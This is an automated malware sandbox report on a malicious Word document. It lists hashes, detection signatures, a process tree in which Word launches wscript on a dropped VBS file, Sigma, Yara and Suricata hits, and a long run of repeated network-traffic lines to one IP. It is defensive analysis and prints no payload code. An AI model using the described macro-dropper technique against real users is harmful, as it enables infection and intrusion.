Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0dsIoO7xjt.docx

Overview

General Information

Sample name:0dsIoO7xjt.docx
renamed because original name is a hash value
Original sample name:01a4a8f7962a076f7a3b71d5d261bc378e0901f0f46eb9d1f453609d3da63e1e.docx
Analysis ID:1590809
MD5:0e9896e59a862c48c6543c7cb0c8b58d
SHA1:4681d90574c5644de87641b298b020f0dc076c06
SHA256:01a4a8f7962a076f7a3b71d5d261bc378e0901f0f46eb9d1f453609d3da63e1e
Tags:app8490744docxhko247blackuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which might only executes on specific systems (country or language check)
Document contains embedded VBA macros
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 5268 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • wscript.exe (PID: 7656 cmdline: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\up[1].txtMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000

Sigma Signatures

System Summary

barindex
Sigma detected: File With Uncommon Extension Created By An Office Application
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 5268, TargetFilename: C:\Users\user\Documents\WindowServices.vbs
Sigma detected: Suspicious Microsoft Office Child Process
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 5268, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , ProcessId: 7656, ProcessName: wscript.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 5268, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , ProcessId: 7656, ProcessName: wscript.exe
Sigma detected: Script Initiated Connection
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.65.251.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7656, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49718
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 5268, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , ProcessId: 7656, ProcessName: wscript.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-14T16:38:32.692580+010020226401A Network Trojan was detected172.65.251.78443192.168.2.549718TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 0dsIoO7xjt.docxVirustotal: Detection: 50%Perma Link
Source: 0dsIoO7xjt.docxReversingLabs: Detection: 42%
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\~WRD0000.tmpJoe Sandbox ML: detected
Machine Learning detection for sample
Source: 0dsIoO7xjt.docxJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.5:49718 version: TLS 1.2

Software Vulnerabilities

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Documents\WindowServices.vbsJump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
Source: global trafficDNS query: name: gitlab.com
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
